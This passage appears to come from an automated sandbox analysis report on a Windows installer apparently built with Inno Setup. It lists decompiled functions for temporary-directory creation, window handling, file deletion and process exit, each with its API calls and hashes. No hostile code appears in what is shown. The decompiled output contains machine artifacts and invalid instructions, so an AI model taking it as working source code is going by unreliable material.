				_push(_t80);
				_push(__ebx);
				_push(_t107);
				_push(0x6aca22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t108;
				E0060D530( &_v20, __ebx, __edx, __edi, __esi); // executed
				E0040A5A8(0x6d6530, _v20);
				_t81 =  *0x6d6530; // 0x0
				E0040B4C8( &_v24, _t81, L"Created temporary directory: ");
				E00616130(_v24, _t79, __edi, __esi);
				_t40 =  *0x6cdfdc; // 0x6d62e4
				if( *_t40 != 0) {
					_t77 =  *0x6d6530; // 0x0
					E0061583C(_t77);
				}
				_t41 =  *0x6d6530; // 0x0
				E005C4EA4(_t41,  &_v28);
				E0040B4C8( &_v8, L"_isetup", _v28);
				_t47 = CreateDirectoryW(E0040B278(_v8), 0); // executed
				if(_t47 == 0) {
					_t79 = GetLastError();
					E005CD508(0x3d,  &_v48, _v8);
					_v44 = _v48;
					E0042302C( &_v52, _t61, 0);
					_v40 = _v52;
					E005C857C(_t79,  &_v56);
					_v36 = _v56;
					E005CD4D8(0x81, 2,  &_v44,  &_v32);
					E00429008(_v32, 1);
					E004098C4();
				}
				E0062554C( &_v12);
				_t113 = _v12;
				if(_v12 != 0) {
					E0040B4C8( &_v16, L"\\_setup64.tmp", _v8);
					E006AC874(_v12, _t79, _v16, _t104, _t105, _t113); // executed
					E006255A4(_v16);
				}
				_pop(_t94);
				 *[fs:eax] = _t94;
				_push(E006ACA29);
				E0040A228( &_v56, 3);
				return E0040A228( &_v32, 7);
			}

























                                                                    0x006ac8cc
                                                                    0x006ac8cc
                                                                    0x006ac8cc
                                                                    0x006ac8cd
                                                                    0x006ac8cf
                                                                    0x006ac8d4
                                                                    0x006ac8d4
                                                                    0x006ac8d6
                                                                    0x006ac8d8
                                                                    0x006ac8d8
                                                                    0x006ac8db
                                                                    0x006ac8dc
                                                                    0x006ac8df
                                                                    0x006ac8e0
                                                                    0x006ac8e5
                                                                    0x006ac8e8
                                                                    0x006ac8ee
                                                                    0x006ac8fb
                                                                    0x006ac903
                                                                    0x006ac90e
                                                                    0x006ac916
                                                                    0x006ac91b
                                                                    0x006ac923
                                                                    0x006ac925
                                                                    0x006ac92a
                                                                    0x006ac92a
                                                                    0x006ac932
                                                                    0x006ac937
                                                                    0x006ac947
                                                                    0x006ac957
                                                                    0x006ac95e
                                                                    0x006ac965
                                                                    0x006ac975
                                                                    0x006ac97d
                                                                    0x006ac989
                                                                    0x006ac991
                                                                    0x006ac999
                                                                    0x006ac9a1
                                                                    0x006ac9b0
                                                                    0x006ac9bf
                                                                    0x006ac9c4
                                                                    0x006ac9c4
                                                                    0x006ac9cc
                                                                    0x006ac9d1
                                                                    0x006ac9d5
                                                                    0x006ac9e2
                                                                    0x006ac9ed
                                                                    0x006ac9f5
                                                                    0x006ac9f5
                                                                    0x006ac9fc
                                                                    0x006ac9ff
                                                                    0x006aca02
                                                                    0x006aca0f
                                                                    0x006aca21

                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
                                                                    • API String ID: 1375471231-4222912607
                                                                    • Opcode ID: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                                    • Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
                                                                    • Opcode Fuzzy Hash: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                                    • Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C92C8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 69%
                                                                    			E005C92C8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t10;
				intOrPtr _t17;
				intOrPtr _t24;
				intOrPtr* _t27;
				struct HWND__* _t33;
				void* _t42;
				intOrPtr _t44;
				void* _t49;
				intOrPtr _t51;
				struct HWND__* _t52;
				intOrPtr _t54;
				intOrPtr _t55;

				_t50 = __esi;
				_t42 = __edx;
				_t54 = _t55;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(__edx != 0) {
					_t55 = _t55 + 0xfffffff0;
					_t10 = E00408A40(_t10, _t54);
				}
				_t49 = _t10;
				_push(_t54);
				_push(0x5c93da);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55;
				E00408414(0);
				 *((intOrPtr*)(_t49 + 0xc)) = GetActiveWindow();
				 *((intOrPtr*)(_t49 + 0x10)) = GetFocus();
				_t17 = E005ABB4C(0, _t42, _t49, _t50); // executed
				 *((intOrPtr*)(_t49 + 0x14)) = _t17;
				if( *0x6d5822 == 0) {
					 *0x6d5822 = RegisterClassW(0x6ccd0c);
				}
				if( *0x6d5822 != 0) {
					_t24 = E00414DA0(0, L"TWindowDisabler-Window", 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0x88000000); // executed
					_t51 = _t24;
					 *((intOrPtr*)(_t49 + 8)) = _t51;
					if(_t51 != 0) {
						_t5 = _t49 + 8; // 0x4134a000
						_t27 =  *0x6cdec4; // 0x6d579c
						E005B8044( *_t27,  &_v8);
						E0040B278(_v8);
						_t33 = E00414DA0(0, L"TWindowDisabler-Window", 0,  *0x6d2634, 0,  *_t5, 0, 0, 0, 0, 0x80000000); // executed
						_t52 = _t33;
						 *(_t49 + 4) = _t52;
						if(_t52 != 0) {
							ShowWindow(_t52, 8); // executed
						}
					}
				}
				SetFocus(0);
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(E005C93E1);
				return E0040A1C8( &_v8);
			}
















                                                                    0x005c92c8
                                                                    0x005c92c8
                                                                    0x005c92c9
                                                                    0x005c92cb
                                                                    0x005c92cd
                                                                    0x005c92ce
                                                                    0x005c92cf
                                                                    0x005c92d2
                                                                    0x005c92d4
                                                                    0x005c92d7
                                                                    0x005c92d7
                                                                    0x005c92de
                                                                    0x005c92e2
                                                                    0x005c92e3
                                                                    0x005c92e8
                                                                    0x005c92eb
                                                                    0x005c92f2
                                                                    0x005c92fc
                                                                    0x005c9304
                                                                    0x005c9309
                                                                    0x005c930e
                                                                    0x005c9319
                                                                    0x005c9325
                                                                    0x005c9325
                                                                    0x005c9333
                                                                    0x005c935e
                                                                    0x005c9363
                                                                    0x005c9365
                                                                    0x005c936a
                                                                    0x005c9379
                                                                    0x005c938a
                                                                    0x005c9391
                                                                    0x005c9399
                                                                    0x005c93a7
                                                                    0x005c93ac
                                                                    0x005c93ae
                                                                    0x005c93b3
                                                                    0x005c93b8
                                                                    0x005c93b8
                                                                    0x005c93b3
                                                                    0x005c936a
                                                                    0x005c93bf
                                                                    0x005c93c6
                                                                    0x005c93c9
                                                                    0x005c93cc
                                                                    0x005c93d9

                                                                    APIs
                                                                    • GetActiveWindow.USER32 ref: 005C92F7
                                                                    • GetFocus.USER32 ref: 005C92FF
                                                                    • RegisterClassW.USER32 ref: 005C9320
                                                                    • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
                                                                    • SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FocusWindow$ActiveClassRegisterShow
                                                                    • String ID: TWindowDisabler-Window
                                                                    • API String ID: 495420250-1824977358
                                                                    • Opcode ID: f6024229119579bb9558f94a5f3e2433b374e9a692c523404650e8e6a3f60a8b
                                                                    • Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
                                                                    • Opcode Fuzzy Hash: f6024229119579bb9558f94a5f3e2433b374e9a692c523404650e8e6a3f60a8b
                                                                    • Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006C4660, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 65%
                                                                    			_entry_() {
				intOrPtr* _t12;
				signed int _t15;
				intOrPtr _t21;
				intOrPtr* _t22;
				intOrPtr* _t28;
				intOrPtr* _t31;
				intOrPtr* _t35;
				intOrPtr _t36;
				void* _t61;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t84;
				void* _t86;
				intOrPtr* _t88;
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t92;
				void* _t93;

				E00410BA8(0x6b9a98);
				_t12 =  *0x6cdec4; // 0x6d579c
				_t15 = GetWindowLongW( *( *_t12 + 0x188), 0xffffffec);
				_t73 =  *0x6cdec4; // 0x6d579c
				SetWindowLongW( *( *_t73 + 0x188), 0xffffffec, _t15 & 0xffffff7f); // executed
				_push(_t88);
				_push(0x6c46f1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				SetErrorMode(1); // executed
				E006B9800(_t90);
				_t21 =  *0x6b96c0; // 0x6b9718
				_t22 =  *0x6cdec4; // 0x6d579c
				E005B8740( *_t22, E006B9758, _t21);
				_t76 =  *0x6cdd3c; // 0x6d57d8
				 *_t76 = 0x6b4380;
				E006B9870(_t62, _t84, _t86, _t90, _t93);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_t28 =  *0x6cdec4; // 0x6d579c
				E005B8250( *_t28, L"Setup", _t90);
				_t31 =  *0x6cdec4; // 0x6d579c
				ShowWindow( *( *_t31 + 0x188), 5);
				_t35 =  *0x6cdec4; // 0x6d579c
				_t36 =  *_t35;
				_t79 =  *0x6a6ef4; // 0x6a6f4c
				 *((intOrPtr*)(_t36 + 0x10c)) = _t79;
				 *((intOrPtr*)(_t36 + 0x108)) = 0x6b3994;
				_push(_t88);
				_push(0x6c479a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				E005B881C(); // executed
				L006B09B0(_t62, _t84, _t86, _t93);
				L005B8834( *((intOrPtr*)( *0x6cdec4)), _t62,  *0x6cdab4,  *0x6a6ef4, _t84, _t86);
				L006B3B64(_t90, _t93);
				_pop(_t81);
				 *[fs:eax] = _t81;
				_push(_t88);
				_push(0x6c481d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				L005B8990( *((intOrPtr*)( *0x6cdec4)), _t62, _t84, _t86);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(_t88);
				_push(0x6c4854);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				L006B2AB0( *0x6cdcd4 & 0xffffff00 |  *( *0x6cdcd4) == 0x00000000, _t62, _t84, _t86,  *( *0x6cdcd4));
				_pop(_t83);
				 *[fs:eax] = _t83;
				_t61 = E0040A028( *( *0x6cdcd4));
				E00409EF8();
				 *((intOrPtr*)(_t61 - 0xfffdfc)) =  *((intOrPtr*)(_t61 - 0xfffdfc)) + _t83;
				asm("invalid");
				 *0x53000000 =  *0x53000000 + 1;
				 *_t88 =  *_t88 + _t61;
				_t92 =  *_t88;
				if (_t92 == 0) goto L5;
				if (_t92 != 0) goto L6;
				if (_t92 < 0) goto 0x6c488e;
			}



























                                                                    0x006c466e
                                                                    0x006c4673
                                                                    0x006c4683
                                                                    0x006c4688
                                                                    0x006c469f
                                                                    0x006c46a6
                                                                    0x006c46a7
                                                                    0x006c46ac
                                                                    0x006c46af
                                                                    0x006c46b4
                                                                    0x006c46b9
                                                                    0x006c46be
                                                                    0x006c46c9
                                                                    0x006c46d0
                                                                    0x006c46da
                                                                    0x006c46e0
                                                                    0x006c46e2
                                                                    0x006c46e9
                                                                    0x006c46ec
                                                                    0x006c470a
                                                                    0x006c4716
                                                                    0x006c471d
                                                                    0x006c472b
                                                                    0x006c4730
                                                                    0x006c4735
                                                                    0x006c4737
                                                                    0x006c473d
                                                                    0x006c4743
                                                                    0x006c474f
                                                                    0x006c4750
                                                                    0x006c4755
                                                                    0x006c4758
                                                                    0x006c4762
                                                                    0x006c4767
                                                                    0x006c477f
                                                                    0x006c478b
                                                                    0x006c4792
                                                                    0x006c4795
                                                                    0x006c47fb
                                                                    0x006c47fc
                                                                    0x006c4801
                                                                    0x006c4804
                                                                    0x006c480e
                                                                    0x006c4815
                                                                    0x006c4818
                                                                    0x006c482e
                                                                    0x006c482f
                                                                    0x006c4834
                                                                    0x006c4837
                                                                    0x006c4845
                                                                    0x006c484c
                                                                    0x006c484f
                                                                    0x006c486a
                                                                    0x006c4872
                                                                    0x006c4877
                                                                    0x006c487d
                                                                    0x006c487f
                                                                    0x006c4885
                                                                    0x006c4885
                                                                    0x006c4888
                                                                    0x006c488a
                                                                    0x006c488c

                                                                    APIs
                                                                      • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006C4683
                                                                    • SetWindowLongW.USER32 ref: 006C469F
                                                                    • SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4
                                                                      • Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                                      • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                                      • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                    • ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                    • String ID: Loj$Setup
                                                                    • API String ID: 1533765661-1180797960
                                                                    • Opcode ID: 3d0304c784d3bd607acd89935b1016d88a71efec8a9d6f2a7abca0b2f7454e11
                                                                    • Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
                                                                    • Opcode Fuzzy Hash: 3d0304c784d3bd607acd89935b1016d88a71efec8a9d6f2a7abca0b2f7454e11
                                                                    • Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005CE26C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 51%
                                                                    			E005CE26C(void* __eax, void* __ebx, long* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				struct tagTEXTMETRICW _v76;
				signed int _t26;
				signed int _t27;
				void* _t36;
				intOrPtr _t43;
				long* _t45;
				signed int* _t47;
				void* _t50;

				_t37 = __ecx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t45 = __ecx;
				_t47 = __edx;
				_t36 = __eax;
				_v8 = GetDC(0);
				_push(_t50);
				_push(0x5ce2f8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xffffffb8;
				SelectObject(_v8, E004EE238(_t36, _t36, _t37, _t45, _t47));
				GetTextExtentPointW(_v8, L"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v16); // executed
				asm("cdq");
				_t26 = _v16.cx / 0x1a + 1;
				_t27 = _t26 >> 1;
				if(_t26 < 0) {
					asm("adc eax, 0x0");
				}
				 *_t47 = _t27;
				GetTextMetricsW(_v8,  &_v76);
				 *_t45 = _v76.tmHeight;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(E005CE2FF);
				return ReleaseDC(0, _v8);
			}













                                                                    0x005ce26c
                                                                    0x005ce272
                                                                    0x005ce273
                                                                    0x005ce274
                                                                    0x005ce275
                                                                    0x005ce277
                                                                    0x005ce279
                                                                    0x005ce282
                                                                    0x005ce287
                                                                    0x005ce288
                                                                    0x005ce28d
                                                                    0x005ce290
                                                                    0x005ce29f
                                                                    0x005ce2b3
                                                                    0x005ce2c0
                                                                    0x005ce2c3
                                                                    0x005ce2c4
                                                                    0x005ce2c6
                                                                    0x005ce2c8
                                                                    0x005ce2c8
                                                                    0x005ce2cb
                                                                    0x005ce2d5
                                                                    0x005ce2dd
                                                                    0x005ce2e1
                                                                    0x005ce2e4
                                                                    0x005ce2e7
                                                                    0x005ce2f7

                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 005CE27D
                                                                      • Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280
                                                                    • SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                                    • GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                                    • GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                                    • ReleaseDC.USER32 ref: 005CE2F2
                                                                    Strings
                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                    • API String ID: 1334710084-222967699
                                                                    • Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                                    • Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
                                                                    • Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                                    • Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00423A20, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E00423A20(void* __eax) {
				signed char _t10;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t17;
				WCHAR* _t18;

				_t17 = __eax;
				_t18 = E0040B278(__eax);
				DeleteFileW(_t18); // executed
				asm("sbb ebx, ebx");
				_t15 = _t14 + 1;
				if(_t15 == 0) {
					_t16 = GetLastError();
					_t10 = GetFileAttributesW(_t18); // executed
					if(_t10 == 0xffffffff || (_t10 & 0x00000004) == 0 || (_t10 & 0x00000010) == 0) {
						SetLastError(_t16);
					} else {
						RemoveDirectoryW(E0040B278(_t17));
						asm("sbb ebx, ebx");
						_t15 = _t15 + 1;
					}
				}
				return _t15;
			}









                                                                    0x00423a24
                                                                    0x00423a2d
                                                                    0x00423a30
                                                                    0x00423a38
                                                                    0x00423a3a
                                                                    0x00423a3d
                                                                    0x00423a44
                                                                    0x00423a47
                                                                    0x00423a4f
                                                                    0x00423a70
                                                                    0x00423a5a
                                                                    0x00423a62
                                                                    0x00423a6a
                                                                    0x00423a6c
                                                                    0x00423a6c
                                                                    0x00423a4f
                                                                    0x00423a7b

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                                    • GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                    • String ID:
                                                                    • API String ID: 2814369299-0
                                                                    • Opcode ID: df722b0e1309f9a81f5fce9d005c1b6d287d6fd7d419b4baf17ebfa420ffd0ff
                                                                    • Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
                                                                    • Opcode Fuzzy Hash: df722b0e1309f9a81f5fce9d005c1b6d287d6fd7d419b4baf17ebfa420ffd0ff
                                                                    • Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409EF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00409EF8() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x6c5004 != 0) {
					E00409DD8();
					E00409E60(_t46);
					 *0x6c5004 = 0;
				}
				if( *0x6d1bd0 != 0 && GetCurrentThreadId() ==  *0x6d1bf8) {
					E00409B30(0x6d1bcc);
					E00409E34(0x6d1bcc);
				}
				if( *0x006D1BC4 != 0 ||  *0x6cf058 == 0) {
					L8:
					if( *((char*)(0x6d1bc4)) == 2 &&  *0x6c5000 == 0) {
						 *0x006D1BA8 = 0;
					}
					if( *((char*)(0x6d1bc4)) != 0) {
						L14:
						E00409B58(); // executed
						if( *((char*)(0x6d1bc4)) <= 1 ||  *0x6c5000 != 0) {
							_t15 =  *0x006D1BAC;
							if( *0x006D1BAC != 0) {
								E0040EBB8(_t15);
								_t31 =  *((intOrPtr*)(0x6d1bac));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00409B30(0x6d1b9c);
						if( *((char*)(0x6d1bc4)) == 1) {
							 *0x006D1BC0();
						}
						if( *((char*)(0x6d1bc4)) != 0) {
							E00409E34(0x6d1b9c);
						}
						if( *0x6d1b9c == 0) {
							if( *0x6cf038 != 0) {
								 *0x6cf038();
							}
							ExitProcess( *0x6c5000); // executed
						}
						memcpy(0x6d1b9c,  *0x6d1b9c, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x6c5000 = 0x6c5000;
						0x6d1b9c = 0x6d1b9c;
						goto L8;
					} else {
						_t20 = E00406FD0();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00408444(_t44);
							_t23 = E00406FD0();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
